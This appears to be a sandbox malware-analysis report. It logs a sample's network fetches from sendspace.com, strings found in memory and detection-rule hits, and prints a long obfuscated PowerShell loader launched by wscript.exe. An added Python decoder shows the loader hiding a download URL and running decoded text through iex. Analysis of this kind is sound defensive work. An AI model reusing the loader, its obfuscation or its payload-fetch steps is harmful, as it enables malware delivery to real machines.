Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49714 version: TLS 1.2 |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.00000000076C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2565659187.00000000077AA000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/7dhid7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n1.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/medjl1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n2.sendspace.comConnection: Keep-AliveCookie: SID=9rlcod4jutplauo2untp3jfqk6 |
Source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microt |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE42000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n1.sendspace.com |
Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2F8F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004C71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 00000008.00000002.2724545147.000000000069D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/ |
Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/. |
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/5778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin |
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119 |
Source: wab.exe, 00000008.00000003.2547665932.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/m |
Source: wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n2.sendspace.com/om:443l |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspaX |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspace.com |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31AED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F31B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FE30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n1.sendspace.com0 |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F30E0B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2561974227.0000000005CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2635114145.0000026F3192E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 00000008.00000002.2724545147.0000000000638000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/IwX |
Source: powershell.exe, 00000002.00000002.2635114145.0000026F2FB17000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7P |
Source: powershell.exe, 00000005.00000002.2558091111.0000000004DC8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/7dhid7XR |
Source: wab.exe, 00000008.00000002.2724545147.0000000000673000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2725055070.0000000000750000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537341476.00000000006A4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/medjl1 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: amsi64_1988.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_2624.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1988, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2624, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7309 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7309 |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: 
tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,l |
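The wscript.exe -> powershell.exe command line above ships its own string decoder. `$Vastities` is assembled from 'Su'+'bstrin'+'g' into the method name Substring, and `Concolor` walks its argument from index 5 in steps of 6 while the index stays below length-1, so it keeps the sixth character of every six-character group and never reaches the last group. `ratlaasene` runs `& ($Protektionerne) (...)`, so whatever `$Protektionerne` decodes to is applied to every decoded statement. The Python below is an added example written for this page, not part of the sandbox report or of the sample: it re-implements that loop and runs it over literals copied from the command line, embedded as a constructed excerpt. The regex, the function names and the excerpt layout are this example's own; the `$Zemas` literal is left out because the report rendering appears to have collapsed runs of spaces inside it, which breaks the six-character alignment.

```python
"""Decoder for the Concolor string obfuscation seen in the captured PowerShell
command line (added example; not part of the sandbox report)."""
import re
from typing import List, Optional, Tuple

# Constructed excerpt: literals copied verbatim from the wscript.exe ->
# powershell.exe command line in the report, joined with the script's own
# "$name=Concolor '...'" and "ratlaasene (Concolor '...')" syntax. Whitespace
# inside the quotes is significant and must be kept exactly. The line wrap the
# report puts inside the second ratlaasene literal ("Sulai: " / "tran\") is
# assumed here to be a single space; it sits on a junk position either way.
SAMPLE_CMDLINE = (
    r"$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';"
    r"$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';"
    r"$Prakriti=Concolor 'Fangs>Neigh ';"
    r"$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';"
    r"ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');"
    r"ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');"
    r"$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';"
)


def concolor(blob: str, start: int = 5, step: int = 6) -> str:
    """Re-implementation of the script's Concolor function.

    The original loop is: for ($i = 5; $i -lt $blob.Length - 1; $i += 6)
    { $out += $blob.Substring($i, 1) }. Each six-character group carries one
    payload character in its last slot; the final group is never reached, so
    it is pure padding.
    """
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


# Matches both "$var=Concolor '...'" and a bare "Concolor '...'" argument.
CONCOLOR_CALL = re.compile(r"(?:(\$\w+)\s*=\s*)?Concolor\s+'([^']*)'")


def decode_command_line(cmd: str) -> List[Tuple[Optional[str], str]]:
    """Decode every Concolor literal in a command line, in order.

    Returns (variable, plaintext) pairs. variable is None for literals that are
    not assigned; in this script those are handed straight to ratlaasene, which
    runs "& ($Protektionerne) (text)", so they are executed statements.
    """
    return [(m.group(1), concolor(m.group(2))) for m in CONCOLOR_CALL.finditer(cmd)]


def assignments(cmd: str) -> dict:
    """Variable name -> decoded value for the assigned literals."""
    return {name: text for name, text in decode_command_line(cmd) if name}


def executed_statements(cmd: str) -> List[str]:
    """Decoded statements that the script passes to ratlaasene."""
    return [text for name, text in decode_command_line(cmd) if name is None]


if __name__ == "__main__":
    for name, text in decode_command_line(SAMPLE_CMDLINE):
        print(f"{name or '<executed via ratlaasene>'}: {text!r}")
```

Decoding shows `$Protektionerne` is `iex`, so each `ratlaasene (Concolor '...')` call invoke-expressions the decoded text; `$Bogbinderi` is the first sendspace URL in the HTTP traffic above and `$Egenartets` the header name used with it; the two executed statements write a marker file to T:\Dimy.txt and exit if that path then exists. When extracting literals from a real report, keep every space: one collapsed space shifts every later group by one and turns the rest of the output into junk.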